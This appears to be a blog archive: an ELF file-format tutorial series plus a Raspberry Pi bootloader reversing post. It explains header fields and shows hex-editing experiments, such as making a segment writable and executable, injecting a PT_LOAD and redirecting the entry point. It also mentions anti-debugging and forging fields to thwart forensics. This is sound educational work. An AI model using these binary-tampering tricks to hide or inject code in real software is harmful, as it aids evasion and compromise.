Some rudimentary anti-debugging right there. Of course the immediate complement of this as a reverse engineering effort would be to reconstitute the section headers from a stripped binary (this would work essentially by understanding common layouts of the file and identifying the most probable offsets for the sh_* fields). It might be worth it to explore what happens when you mangle other section attributes and pass the file to other utilities like strace and ltrace. Moving on!

SHT_NOTE sections (.note.ABI-tag and friends)

The SHT_NOTE type sections are simple lists of integers that provide versioning and typing for vendors. The GNU folks tend to mark ELFs liberally with these sections on GNU/Linux systems. In fact these sections are meant to indicate that they were built by tools from these systems and indicate versioning information about them. So it lists your kernel version or GNU tool version potentially lets say (of course if you're doing forensics this might be helpful, or if you're avoiding it, it might be worth stripping or forging this field hehe).

This section holds some semantic versioning information about the ABI being used and the operating system this file is for. The format is basically three 32-bit words (3 groups of 4 bytes) followed by the name and desc fields, each padded to a 4 byte boundary. For the note shown below the layout works out as follows:

0x00 (4 bytes) namesz - size of the name field in bytes.
0x04 (4 bytes) descsz - size of the desc field in bytes
0x08 (4 bytes) type - the note type, interpreted by whoever owns the name
0x0C (namesz bytes, here 4) name - the name field containing a null terminated list of characters
0x10 (descsz bytes, here 16) desc - the description field holding some numbers that indicate the OS version

Documentation describes that you can potentially have a note section that has no descriptor, in that case we just set the descsz to 0, and don't have the field at 0x10.

Here's what a note section looks like in a hexdump:

Here we can see the following settings for the field values:

namesz is set to 0x04 00 00 00 which means the name field is 4 bytes in size
descsz is set to 0x10 00 00 00 which means the description field is 16 bytes in size
type is set to 0x01 00 00 00, which for a GNU note is NT_GNU_ABI_TAG; the GNU/Linux part is recorded in the first word of desc (because my machines are FREE machines!)
name field reads 0x47 0x4e 0x55 0x00 which we can clearly see reads 'G' 'N' 'U' followed by a null terminator
desc field holds an array of values starting at 0x268 -> 0x27C.

The desc field needs a little explaining and the documentation on it is slim, but here's a couple places that may expand on it better than I do (I've included them in the reading and references section). To see how it's handled check out this extract from glibc-2.28/elf/dl-load.c:

Essentially it indicates the OS version and this is clearly compared to a standardized value in the library when dl-load handles it. How exactly this OS version field works is going to take a little more research on my part before I get much more mouthy about it.

Conclusion

That's going to be it for this post; I don't like to bloat posts with too much text because as we know things are easier to understand when they are broken into smaller parts and carefully studied*(see the side rant for more hehe). In further posts in the series I will expand on the rest of the sections. For now I hope that by cracking open these few I've started you on your way to detailing how the others work too; understanding their types, and therefore their layout, gives us power to control how they are interpreted. There are a lot more tricks that can be pulled off by messing with these fields. So happy hacking!

And stay tuned for the follow up posts on the GNU_HASH and other weird archaic section types.

References and Recommended Reading:

*<side-rant>
Why is this? Why do we need to break things to learn them? Especially in computers? As we know in many sciences we learn how things are built by breaking them down, tearing them apart and boiling away their non-essential parts and deciding what they mean from the perspective of their super-structures - we study how the "super" works by breaking open its "minor" parts i.e. we learn how large complex curves work and behave in calculus by breaking them down into small straight lines; or learn what particles are constituted of, by smashing them into one another so we can see the smaller parts; or learn how philosophy texts work by deconstructing them in some contexts and reconstructing them in other contexts - it seems to be a common theme in fields held to traditions of rigorous logical thinking.

More directly perhaps in the science of computer hacking, because we often work in the realms governed by (or are inevitably always governed by) the capability of computer languages (which themselves are governed by the relations between sets, their labels and sizes); some have realized that our greatest pains and harshest challenges come often straight from underestimating the way languages work when they are allowed to be spoken with their broken, inconsistent and superstructure referencing parts (every language is an expression of a "base" or "host" language that usually has different and more powerful capabilities than its "guest" - in computer science we discern the power of these languages by their computational capabilities).

Just to cleanly connect my points here - one language is the "bigger", around or hosting another language by the size of its computational power and because of the references possible from its "hosting" or subset and computationally smaller languages i.e what it can possibly compute under certain proofs when using those small languages in these contexts. Sometimes they lend "subsets" of this power to isolated subsets of their literal symbols: for instance we have a "language" "within" JavaScript for setting variable values and another "within" JavaScript for controlling execution flow; could for instance a variable setting be allowed to become an if statement or equivalently a control of execution flow? Of course! It's JavaScript! Just stick the variable value in an eval call ;)

So through these languages we can directly speak (strings and other input data) we make reference to outer more powerful structures that appear within languages themselves (or more generally are "equivalently" in the languages themselves - I leave space for category theory and input fuzzing to argue what is the "Set" and therefore what is "in" it as well), that also impose or allow power over their ordering and labeling and effective interpretation. We say that these spirits called "weird machines" arise from learning what we can summon in apparent or seeming "non-weird machines" by giving execution and interpretation to the aspects of a language that are built in the "intersections" between other languages. Quick example relevant here is to say; if you can make string input to a program also impose meaning (ordering or labeling properties) on the stack layout (regardless of how); namely the string is both character data and stack address data, it exposes an intersection of two languages which gives life to the string data in an unusual but powerful way - it is not just displayable but also executable!

Anyway sorry for the philosophical rant - on with the section meta-data mangling! </side-rant>

Introduction to the ELF File Format (Part III) : The Section Headers

2018-09-25T23:42:00.001-07:00

Hi folks! This post is part of a series I'm covering on the ELF format. In this one I'm going to discuss the section headers and unpack how they work.

So far we have:

Introduction to the ELF File Format : The ELF Header (Part I)
Introduction to the ELF File Format Part II : Program Headers (I know the naming is confusing, totally didn't play this out that well but I'll keep it consistent from here on out ;)
This

I know it's a super long list right? But it is going to get a bunch more entries very soon. In this one I'm going to cover the rest of the fields I skipped in the first section, unpack how section headers work and I thought I'd drop a nice illustration of the format as well. Enjoy!

e_flags field and the rest

This header field can contain a number of architecture specific values and sometimes indicate things about the ABI as well. Each architecture defines its own weird set of values for these and they basically mark the ELF with certain attributes, mostly involving whether it makes use of extensions or special code formats. Here's the example for MIPS:

from https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions

As you can see, pretty boring stuff. There are also special fields for ARM and SPARC, and there should be for all the other architectures ELFs can run on (they just aren't as easy to find examples for as those two lol).

e_shstrndx

This field holds the index of the .shstrtab section in the section header table. This section is merely an array of names for sections (used by readelf as well), providing some semantics for interpretation. Each name in the array is terminated by a null byte.

To make sure we know how it works for sure here's a quick diagram showing how this section works:

As you can see, in the header value dump from readelf, the index number is listed as 28. The next image shows a dump of the section header table from readelf -S. We're focused in on entry 28, which is called .shstrtab. The last frame shows an honest hexdump of the file confirming these theories: offset 0x18f4 contains the start of the ASCII data that programs like ld and readelf dereference as the names of the sections.
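To make the lookup concrete, here's a minimal sketch of how a tool could pull a name out of a string table, assuming the table is just names back to back, each terminated by a null byte. The sample table below is made up for illustration (it is not dumped from the file in the screenshots), and read_name is a hypothetical helper name.

```python
def read_name(strtab: bytes, offset: int) -> str:
    """Return the null-terminated string that starts at `offset` in a string table."""
    end = strtab.index(b"\x00", offset)  # the name runs up to the next null byte
    return strtab[offset:end].decode("ascii")


# Made-up string table: a leading null byte, then the names back to back.
SAMPLE_SHSTRTAB = b"\x00.symtab\x00.strtab\x00.shstrtab\x00.interp\x00"

if __name__ == "__main__":
    print(read_name(SAMPLE_SHSTRTAB, 1))
    print(read_name(SAMPLE_SHSTRTAB, 0x1b))
```

The offset passed in is the kind of value a section header stores in its sh_name field, so a reader only needs the table's bytes and that one number to recover a name.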

Okay that's the ELF header finally done and dusted. Let's check out how section headers work.

Section Headers

Finally time to explain the section headers. They serve almost purely to tag areas of the file with semantic information so other files can find symbols, debug information, meta-data about sections themselves and much much more. Here are the ELF header fields that hold information about the section header table:

e_shoff - file offset where the section headers start
e_shnum - number of entries in the section header table
e_shentsize - the size of entries in the section header table

These are pretty straightforward. As you can see, they just allow the ELF interpreters to aim at the start of the table and logically limit the size and number of entries. Each section header table entry itself has a couple of properties to it. Sections have types, related sections that hold meta-data, and names! Here's what the ELF standard defines as section attributes:

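sh_name - the offset into .shstrtab (the section picked out by e_shstrndx) where the section name starts
sh_type - the section type (SHT_NULL, SHT_DYNAMIC,...)
sh_flags - the memory attributes of this section during execution (SHF_WRITE, SHF_ALLOC,...)
sh_addr - the virtual address where this section starts in the memory image (0 if the section is not loaded)
sh_offset - the offset in the file where this section starts
sh_size - the size in bytes this section occupies
sh_link - associates a section to this one, field value can depend on sh_type
sh_info - extra information about the section, field value also depends on sh_type
sh_addralign - memory alignment value for this section
sh_entsize - the size in bytes of each entry, for sections that hold a table of fixed-size entries (0 otherwise)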
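If you'd rather poke at these fields in code than in a hex editor, here's a rough sketch of unpacking one section header entry. It assumes a 64-bit little-endian ELF, where each entry is 64 bytes laid out as sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link, sh_info, sh_addralign, sh_entsize. The helper name parse_shdr and the sample values are made up for illustration.

```python
import struct
from collections import namedtuple

# Elf64_Shdr for a little-endian 64-bit ELF: 64 bytes per entry.
SHDR_FORMAT = "<IIQQQQIIQQ"
Shdr = namedtuple(
    "Shdr",
    "sh_name sh_type sh_flags sh_addr sh_offset sh_size "
    "sh_link sh_info sh_addralign sh_entsize",
)


def parse_shdr(data: bytes, e_shoff: int, e_shentsize: int, index: int) -> Shdr:
    """Unpack section header number `index` from the raw file bytes."""
    start = e_shoff + index * e_shentsize
    return Shdr(*struct.unpack_from(SHDR_FORMAT, data, start))


# Synthetic "file": padding, an empty entry 0, then one made-up entry 1.
fake_entry = struct.pack(SHDR_FORMAT, 0x1B, 1, 0x2, 0x238, 0x238, 0x1C, 0, 0, 1, 0)
fake_file = bytes(0x100) + bytes(64) + fake_entry

shdr = parse_shdr(fake_file, e_shoff=0x100, e_shentsize=64, index=1)

if __name__ == "__main__":
    print(shdr)
```

On a real file you would read e_shoff, e_shentsize and e_shnum from the ELF header first and loop index over range(e_shnum).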

These fields have a number of sub-fields so I've sketched some of them out to give you a kind of cheat sheet overview:

The sh_link field associates this section with another one in order to provide important meta-data for its function. So for instance, if a section requires a list of strings to make sense of its contents, this field will contain the index of the section that contains that data.

A good analogy: if the section is, let's say, a list of pokemon cards, you might need another section to define pokemon card types or hold the name values for the cards. In this case sh_link would point to the section that contains this data. So it allows sections to support one another in function.

We can see examples of this in sections like .rela.plt or .dynsym (the list of dynamic symbols and their properties). .dynsym needs to know where the dynamic symbol names are, so its sh_link holds the index of the string table section that contains them (usually .dynstr).

Here's how it looks when readelf interprets this - with some helpful annotation of course:

I hope that makes it clear what that field is for. It just provides a pointer to another section header with some important associated information. It's pretty much the same story for the sh_info field. Here's what the section header table looks like when it's labelled to reflect the sh_info field references:

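It might look like .dynsym points to the .interp section here, but be careful with that reading. For symbol table sections (SHT_SYMTAB and SHT_DYNSYM) sh_info is not a section index at all: it holds one greater than the symbol table index of the last local symbol. A small value like 1 can simply happen to match the index of .interp in the section header table. For relocation sections like .rela.plt, on the other hand, sh_info really is a section index: it names the section the relocations apply to.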

You might be interested in knowing how this looks in hexdump, so here you go (with nice labels too!):

As you can see, the .shstrtab really is used to dereference the names of the sections. In the raw format, the 0x1b is the offset in .shstrtab where the name of .interp is saved. We can now see that readelf actually fetches this for us and prints out the nice fancy name.

We can move on to unpacking how the symbol and library resolution works. Stay Tuned!

References and Reading

Introduction to the ELF Format Part II : Understanding Program Headers

2018-09-14T00:20:00.001-07:00

Welcome back folks! In the previous post I covered pretty much the most trivial parts of the ELF file format. In this post we are actually going to work with one of the most interesting mechanisms in the file - the program headers! I skipped some parts of the ELF header in the previous post and decided to cover them here, specifically because they describe the Program Headers anyway. Let's get started!

Introduction : What are Program Headers?

I mentioned in part 1 that the ELF format performs two tasks: it is a recipe for how to sublimate dead files into living processes, and it adds the bells and whistles needed to make the file look pretty to gdb, the dynamic loader and a bunch of other tools. Program Headers (among other functions) are mostly for telling the memory loader where to put stuff. They also have some housekeeping functions.

We'll get into how these memory loading powers and formats work a little later; for now it's just important to keep in mind a good idea of what to expect in terms of the purpose of these fields.

ELF Header continued

The ELF header covered in the previous post holds some fields specific to the program headers. These are:

e_phoff - indicates the offset in the file where the program headers start (technically speaking this "needs" to always point to a PHDR section but that's not entirely true - stay tuned!)
e_phentsize - indicates the byte size of program header entries
e_phnum - indicates the number of program header entries

One can imagine that these fields are probably used to help logically limit traversal of the headers.
Let's take a look at what program headers look like in some raw hex:

I had to block out part of my terminal when I made this because I sometimes run a .bashrc that displays some network stuff in my terminal prompt.

If you want to check out the program headers for an elf file these are the magic commands you need:

readelf -l ./compile.elf

As a fun experiment we can play with the e_phoff field to make the program skip some of the program headers. Right now the program headers are shown to start at 0x40 which is 64 bytes into the file - usually they will start there right after the ELF header, but there's no strict reason they need to! Let's see what happens if we shift the e_phoff address down one program header.

So the first program header appears at 0x40 and the next one (the INTERP entry) at 0x78, which is exactly 0x38 = 56 bytes down from the start of the program headers, as indicated by the e_phentsize field in the ELF header.
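The arithmetic here is just "start plus index times entry size". A tiny sketch, using the 0x40 and 0x38 values from above and an arbitrary count of three entries (phdr_offsets is a hypothetical helper name):

```python
def phdr_offsets(e_phoff: int, e_phentsize: int, e_phnum: int) -> list:
    """File offset of every program header entry."""
    return [e_phoff + i * e_phentsize for i in range(e_phnum)]


if __name__ == "__main__":
    # 0x40 and 0x38 come from the sample above; 3 entries is an arbitrary choice.
    print([hex(o) for o in phdr_offsets(0x40, 0x38, 3)])
```

Moving e_phoff from 0x40 to 0x78 is the same as dropping the first element of this list, which is why the first program header disappears from view.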

Editing the raw binary so that e_phoff points to 0x78 results in this readelf output:

You might wonder if this ELF without its PHDR program header still runs? YES! No one cares about your PHDR program header!

There are a number of types of program headers. Each of them with a different purpose:

0x00000006 PT_PHDR - Indicates the location of the program header table itself. According to the documentation this entry, if present, must come before any loadable segment entry. That said, it's not even needed for the ELF to run (according to the sample I'm using here! Of course you may be running on a system or architecture that actually takes this field seriously).
0x00000003 PT_INTERP - this entry indicates the path name of the program that will be invoked as the interpreter of the ELF, should it be an executable. It will of course be ignored if the ELF is not executable. You can try pointing this to other programs to see what happens :)
0x00000001 PT_LOAD - the most important program header type. Defines how a portion of the file must be placed in memory. This leverages the other attributes of the program header and changes their meaning slightly because they appear in this context (see below how p_vaddr, p_paddr etc are explained in the context of PT_LOAD)

The PT_INTERP is a little strange in that it points to an offset in the file that exists purely to hold a string: the file path of the program meant to interpret the file (this is why ours points to ld-linux, the dynamic loader).

Here's what this actually looks like in the raw hex:

There are a number of other program header types; I've only expanded on a couple of the most important ones for this post. It's best to check out the documentation if you want to grasp the full p_type range of values.

Other than this, the program header format has a few more attributes. These are important to understand if you're going to pull off the PT_LOAD wizardry later on in the post.

p_offset - the offset into the ELF file where this segment's content is defined; later on we will point this value to different places.
p_vaddr - the virtual address that this segment will be mapped to, should it be mapped into memory (again this only really applies to PT_LOAD type headers)
p_paddr - the physical address the segment will be mapped to, should the OS running this use a memory loader standard that wants straight up physical address targeting.
p_filesz - this is the size of the segment in the file, basically tells the loader how many bytes to suck out of the ELF.
p_memsz - this is the size of the segment in memory; it can be larger than p_filesz, for instance to leave room for zero-initialised data like the .bss.
p_flags - the permissions under which this segment will be mapped (should it be mapped into memory)
p_align - This field is to make sure the segments when mapped in are aligned to memory properly. For a proper explanation please see the documentation.
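Here's a rough sketch of reading one program header entry and decoding its permission bits. It assumes a 64-bit little-endian ELF, where an entry is 56 bytes laid out as p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align (note that in the 64-bit layout p_flags sits right after p_type). The helper names and the sample values are made up for illustration.

```python
import struct
from collections import namedtuple

# Elf64_Phdr for a little-endian 64-bit ELF: 56 (0x38) bytes per entry.
PHDR_FORMAT = "<IIQQQQQQ"
Phdr = namedtuple(
    "Phdr", "p_type p_flags p_offset p_vaddr p_paddr p_filesz p_memsz p_align"
)

PT_LOAD = 1
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4  # execute, write, read bits of p_flags


def parse_phdr(data: bytes, offset: int) -> Phdr:
    """Unpack the program header entry that starts at `offset`."""
    return Phdr(*struct.unpack_from(PHDR_FORMAT, data, offset))


def flags_to_str(p_flags: int) -> str:
    """Render p_flags the way a memory map would, e.g. 'r-x'."""
    return (
        ("r" if p_flags & PF_R else "-")
        + ("w" if p_flags & PF_W else "-")
        + ("x" if p_flags & PF_X else "-")
    )


# A made-up PT_LOAD entry, read + exec, mapped at 0x400000.
fake = struct.pack(
    PHDR_FORMAT, PT_LOAD, PF_R | PF_X, 0, 0x400000, 0x400000, 0x6F4, 0x6F4, 0x200000
)
phdr = parse_phdr(fake, 0)

if __name__ == "__main__":
    print(phdr, flags_to_str(phdr.p_flags))
```

Feeding flags_to_str the value 0x07 gives the "everything on" permission set, which is handy to keep in mind for the p_flags experiments later in the post.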

So just to recap, each program header has these p_* fields but whether the p_type is PT_LOAD or not decides whether the content described by the program header will actually end up as part of the memory image. The emphasis in the above sentence is because sometimes (due to the chunk based loading style of the kernel) the entire header table can end up in memory.

Anyway, moving on, we should for interest's sake fiddle with some p_type values and see what happens.

If we throw some crazy bytes at the program header type field readelf spits out some interesting stuff:

There are a couple more types to explore, some of which can sometimes be neat places to stuff things you need during an exploit. Either way it's great to get to know the full set of behaviors the file is capable of - this way we can learn to describe more epic exploits with it!

Okay so PT_LOAD commands must be pretty interesting to mess around with, so let's get that going next.

PT_LOAD commands

PT_LOAD commands, as covered above, tell the loader where to stick what, with which permissions. Let's try something simple that will not immediately affect execution, but allows us to see the effect of our influence on the file. A good idea for this would be flipping some bits in the segment's p_flags field.
They are pretty easy to spot in raw hex. Here's me flipping the permissions on a PT_LOAD segment to full exec, write and read. These permissions are bit flags: 0x1 for exec, 0x2 for write and 0x4 for read (please see documentation for the full spec), so we are going to give it the value 0x07:

If we're going to understand how things end up in memory from the interpretation of the ELF file we need to confirm our projections by looking at actual memory.

This is a pretty easy thing to do in linux: the /proc/[PID]/maps file spits out the current memory map (which will show you a good summary of where things are, what permissions they have etc etc). In addition we can fiddle with some PT_LOAD commands and then scratch around in the process's memory using gdb. Here's the general methodology for testing PT_LOAD options and confirming them:

1 - Mangle the headers as above
2 - Open the file in gdb using `gdb ./compile_me.elf`
3 - Set a break point for _start , it should still execute _start since all this involves is pointing the rip there once the program is loaded and uhm well, letting it RIP!
4 - Once the break point triggers we ask gdb what the process id is
5 - Using the process id from Step 4 we can look up the memory map using the /proc/PID/maps device

The following screenshot shows how this is done:

And there you have it the memory is actually mapped with this crazy full perm setting!
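If you want to check the permissions programmatically instead of eyeballing the screenshot, here's a minimal sketch that picks apart one line of a /proc/PID/maps listing. The sample line is made up (including the path and inode), and parse_maps_line is a hypothetical helper name; real lines follow the same "range perms offset dev inode path" layout.

```python
from typing import NamedTuple


class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    path: str


def parse_maps_line(line: str) -> Mapping:
    """Split one /proc/PID/maps line into its address range, permissions and path."""
    fields = line.split(None, 5)  # range, perms, offset, dev, inode, [path]
    start, end = (int(x, 16) for x in fields[0].split("-"))
    path = fields[5].strip() if len(fields) > 5 else ""  # anonymous maps have no path
    return Mapping(start, end, fields[1], path)


# Made-up sample line showing a segment mapped with full permissions.
SAMPLE = "00400000-00401000 rwxp 00000000 08:01 131090 /home/user/compile_me.elf\n"
m = parse_maps_line(SAMPLE)

if __name__ == "__main__":
    print(hex(m.start), hex(m.end), m.perms, m.path)
```

To run it against a live process you would loop over open(f"/proc/{pid}/maps") with the pid gdb reported and look for the entry whose range contains the segment's p_vaddr.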

Redirecting PT_LOADs

Okay so we can definitely change permissions but can we say change the address of a section in the actual memory image? Sure! Here's me doing that:

hexedit the p_vaddr of the first PT_LOAD segment in the ELF file
open the binary in gdb
break point on _start
pop open the memory map

You should be able to see something like this:

Of course this doesn't really execute it kind of dies just after _start gets executed:

We can also inject an extra PT_LOAD command. An easy way to inject another load command is to just rewrite the type of another program header. Try using the PT_NOTE segment; it is pretty much ignored for our purposes. So here's me retyping the PT_NOTE to be an injected PT_LOAD:

This runs perfectly! Here's me confirming this in gdb, I've also included the live memory map:

And that's it for this one! I'm sure you folks can figure out more interesting games to play with the program headers. In the next post I'm going to start covering the section headers. Stay Tuned!

References and Reading:

https://en.wikipedia.org/wiki/Executable_and_Linkable_Format

Introduction to the ELF Format : The ELF Header (Part I)

2018-09-12T23:01:00.000-07:00

ELF files are charged with using their magic to perform two holy tasks in the linux universe. The first is to tell the kernel where to place stuff from the ELF file on disk into memory. The second is to provide ways to invoke the dynamic loader's functions and maybe even help out with some debugging information. Essentially, it tells the kernel where to put things in memory, and it tells the plethora of tools that interpret the file where to find the data structures that hold useful information for making sense of the file. Anyway that's as far as I've figured it out - the actual break down is a little less simple.

I'll demonstrate why this is so here and over the next series of posts in the classic "Learn things by breaking them" style.

ELF Header and Identification fields

The first thing that appears in an ELF file is of course the header, which is like most things in file formats just a list of offsets in the file. Its purpose is to indicate essentially what kind of ELF this is and where the various interpreters of the file can find the good stuff.

Here's what the header looks like (I've included a sample here, you can grab any ELF file on the system):

If you're not super used to the linuxy world, please don't pay strong attention to the .elf extension on my file; normally ELF files do not have extensions on their file names.

The first field is called the ELF Identification. The ELF format is pretty flexible in that this same format can run on a ton of different architectures, with support for multiple encodings and Application Binary Interfaces. Here's the break down on how the EI_IDENT field works:

Offset 0x00 - 0x03 EI_MAG0 ... EI_MAG3 The first four bytes of every ELF file are 0x7f followed by the ASCII codes for 'E' 'L' 'F'.
Offset 0x04 EI_CLASS basically tells us whether the file is 32 or 64 bit. Standard says 0x1 means 32 bit and 0x2 means 64 bit.
Offset 0x05 EI_DATA defines the endianness of the file, 0x01 means little endian and 0x02 means big endian.
Offset 0x06 EI_VERSION shows the version of the ELF file, most should be set to 0x1 for version 1.
Offset 0x07 EI_OSABI shows the OS Application Binary Interface (ABI) extensions to the ELF file being enabled. Please bear in mind the documentation is a bit flaky here and may sometimes depend heavily on the interpretation of the particular OSABI involved.
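As a quick sanity check on those offsets, here's a small sketch that decodes the first eight identification bytes. The sample bytes are hand-built for illustration (a 64-bit, little endian, version 1 file), not copied from the file in the screenshot, and parse_ident is a hypothetical helper name.

```python
def parse_ident(data: bytes) -> dict:
    """Decode the identification bytes at the very start of an ELF file."""
    if data[0:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    return {
        "class": {1: "ELF32", 2: "ELF64"}.get(data[4], "unknown"),
        "data": {1: "little endian", 2: "big endian"}.get(data[5], "unknown"),
        "version": data[6],
        "osabi": data[7],
    }


# Hand-built sample: magic, 64-bit, little endian, version 1, OSABI 0, padding.
SAMPLE_IDENT = bytes([0x7F, 0x45, 0x4C, 0x46, 2, 1, 1, 0]) + bytes(8)

if __name__ == "__main__":
    print(parse_ident(SAMPLE_IDENT))
```

Changing the byte at offset 0x06 in the sample and re-running is the in-memory version of the hexedit experiment on the version field.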

One can see what the EI_IDENT field says by looking at the output of readelf -h.

Pretty interesting stuff!

Let's see what happens when we change the value of the ELF version number. Pop open hexedit and change offset 0x06 in the file to whatever you want, then run readelf -h on it. Here's what happens when I do this:

ELF Type, Machine and Version Fields

The next field after the e_ident field is e_type. In the example above I claim that the type is EXEC (since it reads 0x02 0x00), which according to the ELF standard means it's meant to be executed (checking the standard will confirm this).

Let's dump the header of what is probably a shared object and compare the e_type field, for instance. Here's the header for libvlc:

Yup looks like the byte offsets agree!

This one has the field for e_type set to the bytes 0x03 0x00 at offset 0x10 in the file header - this means it's an ELF type of DYN which means it's definitely a shared object. And here's readelf confirming this information:

After the type field we find the e_machine specification for the file which can have a number of settings each indicating the architecture this file is meant for. Again ELF supports a number of architectures so there's a range of values this can take. Might be a good idea to fiddle with this field and see what happens.
Here's some examples I found that don't appear in normal documentation:

Always good to throw a couple bytes at the format and see what it really does! Moving on, the next field is e_version, which also indicates the ELF version number and should match the version byte in the EI_IDENT field. You can pretty much set this to anything and it should still run:

The next field is one of the most important so I thought I would pop it in its own section and show you how to fiddle with it in a way that confirms its behavior.

The e_entry field

The e_entry field holds the virtual address where the program should start executing. Normally it points to your _start method (of course if you compiled it with the usual stuff). You can point the e_entry anywhere you like; as an example I'm going to show that you can call a function that would otherwise be impossible to reach under normal execution. To start, here's the C program and the Makefile I'm using:

As you can see the never_call function never does get called in the main method. And when you run it the following happens:

Now let's see if we can make the e_entry point to the never_call method. To do that we need to get the following done:

Look up the virtual address of the never_call function with objdump
Stick the virtual address in the e_entry field
Run the binary and confirm the output

Here's how you look up the address of the never_call function. Run objdump -D compile_me.elf and look for the never_call function. Alternatively you could try objdump -D compile_me.elf | grep never_call.

In my example the never_call is at address 0x400526.
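If you'd rather script the patch than do it by hand in hexedit, here's a minimal sketch. It assumes a 64-bit little-endian ELF, where e_entry is an 8-byte field at offset 0x18 in the header. The header below is a synthetic 64-byte buffer and the "original" entry point 0x400430 is made up; only 0x400526 comes from my example above. set_entry is a hypothetical helper name.

```python
import struct

E_ENTRY_OFFSET = 0x18  # e_entry in a 64-bit ELF header (assumption: ELF64, little endian)


def set_entry(header: bytearray, new_entry: int) -> int:
    """Overwrite e_entry in place and return the old value."""
    (old,) = struct.unpack_from("<Q", header, E_ENTRY_OFFSET)
    struct.pack_into("<Q", header, E_ENTRY_OFFSET, new_entry)
    return old


# Synthetic header: just the magic and a made-up original entry point.
header = bytearray(64)
header[0:4] = b"\x7fELF"
struct.pack_into("<Q", header, E_ENTRY_OFFSET, 0x400430)

old_entry = set_entry(header, 0x400526)

if __name__ == "__main__":
    print(hex(old_entry), header[E_ENTRY_OFFSET:E_ENTRY_OFFSET + 8].hex())
```

On a real binary you would read the file into a bytearray, call set_entry on it and write the bytes back out to a copy. Note how the address ends up byte-reversed in the file, which is what you have to type in the hex editor too.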

If you've injected the address correctly readelf -h ./compile_me.elf should show the following:

and when you run it you should see...

That's it for this post folks! In Part II I'll cover the rest of the ELF header and do some weird stuff with PT_LOAD commands. Stay Tuned!

References and Reading

Reversing a bare bones Raspberry Pi Kernel : Branching To the Kernel

2018-07-15T00:45:00.000-07:00

I lost the first version of this post because of a problem in blogger's auto-save function.

Anyway, if you want to get your own raspberry pi os kernel going, I share some cool posts on that in here and expand on them by unpacking some of the assembler code, essentially reverse engineering it or "unrolling" the os.

Setting up your Development Environment

I think the explanation in 'Roll your own Raspberry Pi OS' at https://jsandler18.github.io/ pretty much sorts this out. I can at least do the favor of confirming that this person's advice definitely does the job, so check it out. The post also discusses the background of why we need certain files in the project, for instance the linker scripts and kernel.c files. As a short summary here's the basic work flow:

1 - Write a linker script

This is to make sure the linker can recombine the boot.S and kernel.c parts

2 - Write a boot.S

This file is to initialize the run time for your kernel and branch into it.

3 - Write a kernel.c

This is the actual kernel, we will be using the C run time. Mine looks like this:

4 - Compile boot.S, kernel.c

To get some object files

5 - link the objects and run your kernel

Once you've compiled and launched your own kernel a couple times you might want to try to reverse engineer it to make sure you know it at all its levels of existence as software.

Let's get started!

Reverse engineering a basic ARM bootloader

Of course in order to get hold of the assembly code for your kernel you need to invoke the cross compiled objdump on your kernel image like so:

So the first thing we do in the boot.S file is define a couple of labels and import some as well. You don't need to worry too much about these, they are pretty standard linking stuff. I'm more interested in the instructions being defined in the .start label, and if you haven't guessed it, this code is what gets the ball rolling.

The first thing we see there is this weird instruction:

mrc p15,#0,r1,c0,c0,#5

What this command does is essentially use a special feature that ARM has called "coprocessors". They are units on an ARM board that extend features like caching, memory management stuff, gpu, etc; it depends a little on the hardware folks what's going on with these sometimes. The documentation says the following about the CP15 coprocessor, which is the one we are invoking using the MRC operation:

The CP15 system registers provide control and status information for the functions implemented in the processor. The main functions of the CP15 system registers are:

Overall system control and configuration.
Memory Management Unit (MMU) configuration and management.
Cache configuration and management.
Virtualization and security.
System performance monitoring.

In order to use these wonderful features we need to invoke the MRC/MCR commands and pass them some arguments and opcodes. The MRC instruction is the following (According to the ARM documentation):

Move to ARM register from coprocessor. Depending on the coprocessor, you might be able to specify various operations in addition.

Which doesn't explain much really. Critically, it says that this gives access to the coprocessor functions, and what they do depends on uhm how they are defined. There's a slightly more helpful Stack Overflow post I found here, and it says the following:

MRC stands for "send a command to a coprocessor and get some data back"

So the command and what you get back depend on the specific definitions for the coprocessor. But it is meant to service a fetch+do style command, basically: do stuff for me and return some information. The command format also needs a little explaining; here's how MRC basically works:

MRC{cond} coproc, opcode1, Rd, CRn, CRm{, opcode2}

There's a way to conditionally execute this, but I'm gonna stick to the non-cond form for now. The coprocessors are numbered p0-p15, here's the breakdown on what they all do. For each of them you can do stuff like read property values with mrc and set them with mcr by specifying opcode1 and opcode2, which can be a range of integer values (we will discuss the ones used here below). CRn and CRm specify additional coprocessor registers; again these are defined according to the table below. And most importantly for us, the Rd placeholder is the ARM register that receives the result - our example here targets r1 in order to save a copy of the Multiprocessor Affinity Register. Our invocation has opcode1 as 0 and opcode2 as 5, which means this according to the documentation:

CRn	Op1	CRm	Op2	Name	Reset	Description
c0	0	c0	0	MIDR	`0x410FC075`	Main ID Register
...
			5	MPIDR	-^[a]	Multiprocessor Affinity Register

At the bottom of the Multiprocessor Affinity Register page linked above it gives the following example command, which looks a lot like what we are doing:

To access the MPIDR, read the CP15 registers with:

MRC p15, 0, <Rt>, c0, c0, 5; Read Multiprocessor Affinity Register

What our code is doing with the Multiprocessor Affinity Register's value is copying it into r1, most probably to check that it has a certain setting. The documentation states the following about how the register's value is formatted:

Which says that the CPU ID field looks like this:

[1:0]

CPU ID

Indicates the processor number in the Cortex-A7 MPCore processor. For:

One processor, the CPU ID is 0x0.
Two processors, the CPU IDs are 0x0 and 0x1.
Three processors, the CPU IDs are 0x0, 0x1, and 0x2.
Four processors, the CPU IDs are 0x0, 0x1, 0x2, and 0x3.

Given that the instruction here and's r1 with 3:

It seems that it is checking the value of the CPU ID using a bit mask: and-ing with 3 (11 in binary) keeps only bits [1:0], which is exactly the CPU ID field. If it's not 3 then it halts. Why is it checking if it's 3? I think right now this is so that it can make sure it's running on one core, so it checks the ID to make sure it's the last one. Changing the #3 literal in boot.S and running the code shows that the kernel runs a couple of times (executes the instructions more than once) if you don't make sure you are running on the ID with 3 as the first 2 bits.
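The masking step on its own is easy to play with outside the board. Here's a tiny sketch; the upper bits of the sample register values are made up purely for illustration, only the low two bits (the CPU ID field) matter here, and cpu_id is a hypothetical helper name.

```python
CPU_ID_MASK = 0b11  # bits [1:0] of the Multiprocessor Affinity Register


def cpu_id(mpidr: int) -> int:
    """Same job as `and r1, r1, #3`: throw away everything but the CPU ID bits."""
    return mpidr & CPU_ID_MASK


if __name__ == "__main__":
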